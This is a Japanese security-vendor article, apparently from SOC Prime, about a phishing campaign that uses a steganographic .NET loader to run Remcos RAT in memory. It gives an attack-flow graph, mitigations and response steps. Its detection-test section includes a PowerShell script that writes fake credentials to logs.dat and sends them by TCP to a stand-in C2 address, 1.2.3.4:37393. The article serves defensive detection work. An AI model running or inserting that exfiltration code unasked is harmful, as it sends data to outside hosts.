SOC Prime Bias:

24 Jun 2026 06:40 UTC
newspaper icon K7 Labs

多段階ステガノグラフィックローダーキャンペーンで多様なペイロードを全世界に配信

Author Photo
SOC Prime Team linkedin icon フォローする
多段階ステガノグラフィックローダーキャンペーンで多様なペイロードを全世界に配信
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


概要

マルチステージのマルウェアキャンペーンは、ステガノグラフィとインメモリ実行を利用して、Remcos RATを含む複数のペイロードを配信します。感染の連鎖は、.NET実行ファイルをドロップする悪意のあるアーカイブを含んだフィッシングメールから始まります。その実行ファイルは、埋め込まれたリソースとステガノグラフ法を使用して、後続の段階を直接メモリにロードし、マルウェアがディスクベースの検出を回避するのを助けます。

調査

調査は、テレメトリが GST Debit Note Apr_26.comという名前の不審なファイルをフラグした後に始まりました。アナリストは、そのファイルがゲームに偽装された32ビット.NET実行ファイルであることを確認しました。さらなる逆アセンブリにより、次のステージのローダーを隠す.NETビットマップオブジェクトに埋め込まれたステガノグラフィが明らかになり、 Optimax.dllがメモリ内で完全に実行されるのが確認されました。

緩和策

組織は、疑わしいアーカイブの添付ファイルやフィッシング試行をブロックするために強力なメールフィルタリングを展開すべきです。EDRソリューションは、インメモリ実行、プロセスホロー、疑わしいPowerShell動作を検出できることが求められます。また、チームは特にRunキーでの不正なレジストリ変更を監視し、署名されていない実行ファイルの起動を防ぐために厳格なアプリケーションコントロールを強制するべきです。

対応策

影響を受けたエンドポイントは、側方移動とデータ窃盗を制限するために直ちに隔離されるべきです。調査者はファイルレスコンポーネントを特定し、 Remcos_Mutex_Inj ミューテックスの存在を確認するためにメモリフォレンジックを実行するべきです。完全なスイープもまた、 AppData ディレクトリとレジストリのRunキーにおける不正な持続性を確認し、マルウェアがアクセスした可能性のあるユーザーのブラウザアカウントの資格情報をリセットするべきです。

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ff99cc classDef technique fill:#c2f0c2 classDef file fill:#e1e1e1 %% Node Definitions %% Initial Access attack_phishing["<b>Action</b> – <b idea='T1566.001'>Phishing: Spearphishing Attachment</b><br/><b>Details</b>: Malicious archive GST Debit Note Apr_26.com sent to victims."] class attack_phishing action %% Evasion and Loader Stage 1 evasion_stego["<b idea='T1027.003'>Obfuscated Files or Information: Steganography</b><br/><b>Details</b>: Hiding Optimax.dll inside a serialized .NET Bitmap object<br/>within the executable resource section."] class evasion_stego technique exec_appdomain["<b idea='T1574.014'>Hijack Execution Flow: AppDomainManager</b><br/><b>Details</b>: Using reflection and AppDomain.Load to execute<br/>payload directly from memory without touching disk."] class exec_appdomain technique %% Second Stage loader_stage2["<b idea='T1055.012'>Process Injection: Process Hollowing</b><br/><b>Details</b>: System Optimizer Ultimate.dll deploys final payload<br/>by hollowing a default browser process."] class loader_stage2 technique malware_remcos["<b idea='Malware'>Remcos RAT</b><br/><b>Description</b>: Remote Access Trojan deployed<br/>as the final payload."] class malware_remcos malware %% Persistence and Evasion evasion_sandbox["<b idea='T1497'>Virtualization/Sandbox Evasion</b><br/><b>Details</b>: Checking for sbiedll.dll and registry keys<br/>to detect sandboxes or virtual machines."] class evasion_sandbox technique persistence_active["<b idea='T1547.014'>Boot or Logon Autostart Execution: Active Setup</b><br/><b>Details</b>: Copying malware to AppDataRoaming and<br/>configuring a Run registry key for persistence."] class persistence_active technique %% Collection and Exfiltration collect_browser["<b idea='T1217'>Browser Information Discovery</b><br/><b>Details</b>: Collecting Chrome and Firefox credentials."] class collect_browser technique steal_cookies["<b idea='T1539'>Steal Web Session Cookie</b><br/><b>Details</b>: Capturing active web session cookies."] class steal_cookies technique exfil_c2["<b idea='T1041'>Exfiltration Over C2 Channel</b><br/><b>Details</b>: Sending captured data from logs.dat<br/>to the attacker via Command and Control."] class exfil_c2 technique file_logs["<b idea='File'>logs.dat</b><br/><b>Description</b>: Local file used to store

graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ff99cc classDef technique fill:#c2f0c2 classDef file fill:#e1e1e1 %% Node Definitions %% Initial Access attack_phishing[“<b>Action</b> – <b idea=’T1566.001′>Phishing: Spearphishing Attachment</b><br/><b>Details</b>: Malicious archive GST Debit Note Apr_26.com sent to victims.”] class attack_phishing action %% Evasion and Loader Stage 1 evasion_stego[“<b idea=’T1027.003′>Obfuscated Files or Information: Steganography</b><br/><b>Details</b>: Hiding Optimax.dll inside a serialized .NET Bitmap object<br/>within the executable resource section.”] class evasion_stego technique exec_appdomain[“<b idea=’T1574.014′>Hijack Execution Flow: AppDomainManager</b><br/><b>Details</b>: Using reflection and AppDomain.Load to execute<br/>payload directly from memory without touching disk.”] class exec_appdomain technique %% Second Stage loader_stage2[“<b idea=’T1055.012′>Process Injection: Process Hollowing</b><br/><b>Details</b>: System Optimizer Ultimate.dll deploys final payload<br/>by hollowing a default browser process.”] class loader_stage2 technique malware_remcos[“<b idea=’Malware’>Remcos RAT</b><br/><b>Description</b>: Remote Access Trojan deployed<br/>as the final payload.”] class malware_remcos malware %% Persistence and Evasion evasion_sandbox[“<b idea=’T1497′>Virtualization/Sandbox Evasion</b><br/><b>Details</b>: Checking for sbiedll.dll and registry keys<br/>to detect sandboxes or virtual machines.”] class evasion_sandbox technique persistence_active[“<b idea=’T1547.014′>Boot or Logon Autostart Execution: Active Setup</b><br/><b>Details</b>: Copying malware to AppDataRoaming and<br/>configuring a Run registry key for persistence.”] class persistence_active technique %% Collection and Exfiltration collect_browser[“<b idea=’T1217′>Browser Information Discovery</b><br/><b>Details</b>: Collecting Chrome and Firefox credentials.”] class collect_browser technique steal_cookies[“<b idea=’T1539′>Steal Web Session Cookie</b><br/><b>Details</b>: Capturing active web session cookies.”] class steal_cookies technique exfil_c2[“<b idea=’T1041′>Exfiltration Over C2 Channel</b><br/><b>Details</b>: Sending captured data from logs.dat<br/>to the attacker via Command and Control.”] class exfil_c2 technique file_logs[“<b idea=’File’>logs.dat</b><br/><b>Description</b>: Local file used to store<br/>stolen credentials and cookies.”] class file_logs file %% Connections %% Flow of attack attack_phishing –>|leads_to| evasion_stego evasion_stego –>|unpacks| exec_appdomain exec_appdomain –>|loads| loader_stage2 loader_stage2 –>|deploys| malware_remcos %% Malware actions malware_remcos –>|performs| evasion_sandbox malware_remcos –>|establishes| persistence_active malware_remcos –>|performs| collect_browser collect_browser –>|leads_to| steal_cookies steal_cookies –>|saves_to| file_logs file_logs –>|sent_via| exfil_c2

攻撃フロー

シミュレーションの実行

前提条件: テレメトリとベースラインの事前飛行チェックが合格していること。

根拠: このセクションは、検出ルールをトリガーするように設計された敵対技術(TTP)の正確な実行を詳述しています。コマンドとナラティブは、特定されたTTPを直接反映し、検出ロジックが期待する正確なテレメトリを生成することを目的としています。抽象的または無関係な例は誤診を招きます。

  • 攻撃の物語とコマンド: 敵対者は足場を確立しました。目標を達成するために、システムテレメトリを収集し、標準システムログに偽装した logs.dat という名前のファイルにそれを隠しています。その後、ネットワーク接続を開始し、設立されたC2インフラストラクチャ(このシミュレーションのためにIP 1.2.3.4 とポート 37393 を使用)にデータを密かに送信します。これは、特定のハードコードされたチャネルを通じてネットワークからデータを移動しようとするステガノグラフィックローダーの動作を模倣しています。

  • 回帰テストスクリプト:

    # 特定のファイル名およびC2パラメータによるデータ流出のシミュレーション
$C2_IP = "1.2.3.4" # シミュレーションのC2 IP
$C2_PORT = 37393
$FILENAME = "logs.dat"

# 1. '悪意ある'データファイルを作成する
Write-Output "Sensitive Data: UserCredentials_Admin_Pass123" | Out-File -FilePath "$env:TEMP$FILENAME"

# 2. C2へのネットワーク接続をシミュレートする
# TCPクライアントを使用して特定のポート/IPテレメトリを強制する
try {
    $client = New-Object System.Net.Sockets.TcpClient($C2_IP, $C2_PORT)
    $stream = $client.GetStream()
    $data = [System.Text.Encoding]::ASCII.GetBytes((Get-Content "$env:TEMP$FILENAME"))
    $stream.Write($data, 0, $data.Length)
    $client.Close()
} catch {
    Write-Host "接続が失敗しました (IPが存在しない場合に予想される) が、テレメトリはファイアウォールによって捕捉されるはずです。"
}

  • クリーンアップコマンド:

    # シミュレートされた悪意のあるファイルを削除する
Remove-Item -Path "$env:TEMPlogs.dat" -ErrorAction SilentlyContinue

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加